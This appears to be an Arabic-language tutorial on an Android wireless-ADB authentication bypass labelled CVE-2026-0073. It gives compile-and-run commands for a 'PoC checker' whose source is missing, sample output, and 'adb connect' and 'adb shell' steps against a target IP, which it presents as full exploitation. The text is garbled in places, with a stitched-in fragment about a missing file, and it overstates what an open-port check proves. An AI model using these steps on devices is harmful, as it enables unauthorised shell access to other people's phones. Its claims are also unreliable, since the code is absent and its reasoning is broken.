
CVE-2026-0073
CVE-2026-0073 هي ثغرة خطيرة في تجاوز المصادقة في خدمة ADB اللاسلكي (الخفي adbd) في نظام Android.
يمكن لمهاجم موجود على نفس الشبكة تجاوز مصادقة TLS المتبادلة والاتصال بالجهاز دون موافقة المستخدم أو اقتران سابق.
| العنصر | التفاصيل |
|---|---|
| معرف CVE | CVE-2026-0073 |
| الخطورة | حرجة |
| درجة CVSS | 8.8 |
| المكون المتأثر | adbd (جسر تصحيح أندرويد) - معالج TLS |
| النوع | تجاوز المصادقة |
| التأثير | وصول عن بُعد إلى الصدفة (مستخدم shell) |
| تم التصحيح | نشرة أمن أندرويد مايو 2026 |
تم الإصلاح في: مستوى تصحيح الأمان 2026-05-01 وما بعده.
shelladbd_tls_verify_cert()يحدث الخطأ لأن الملف CVE-2026-0073-Checker.cpp غير موجود بعد.
nano CVE-2026-0073-Checker.cpp
انسخ والصق الكود الكامل أدناه في المحرر:
احفظ واخرج (Ctrl + X → Y → Enter)
ترجم مرة أخرى:
g++ -o CVE-2026-0073 CVE-2026-0073-Checker.cpp -lssl -lcrypto -Wall -O2
./CVE-2026-0073 192.168.1.105
إليك ما ستراه بالضبط إذا عمل برنامج C++ بنجاح على جهاز Android ضعيف:
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0073 PoC Checker ║
║ Android Wireless ADB Authentication Bypass ║
╚══════════════════════════════════════════════════════════════╝
Target : 192.168.1.105
[*] Checking 192.168.1.105:5555 → OPEN
[!] Wireless ADB Port is Open!
[!] High chance of being vulnerable to CVE-2026-0073
Next Steps:
1. adb connect 192.168.1.105:5555
2. adb shell
OPEN باللون الأخضر → منفذ ADB يستمع.شغّل هذه الأوامر:
adb connect 192.168.1.105:5555
إذا ظهرت الرسالة:
connected to 192.168.1.105:5555
ثم اكتب:
adb shell
يجب أن تحصل على وصول داخل الجهاز:
pixel8:/ $
هذا استغلال كامل وناجح.
إثبات المفهوم هذا هو لأغراض تعليمية واختبار مصرح به فقط.
يمكنك استخدام هذه الأداة فقط على الأجهزة التي تملكها أو لديك إذن صريح لاختبارها. الاستخدام غير المصرح به غير قانوني وممنوع تمامًا.
الاستخدام على مسؤوليتك الخاصة. المؤلف غير مسؤول عن أي ضرر أو عواقب قانونية.
🎯 أُعد بحذر — استخدم فقط على الأجهزة المصرح بها.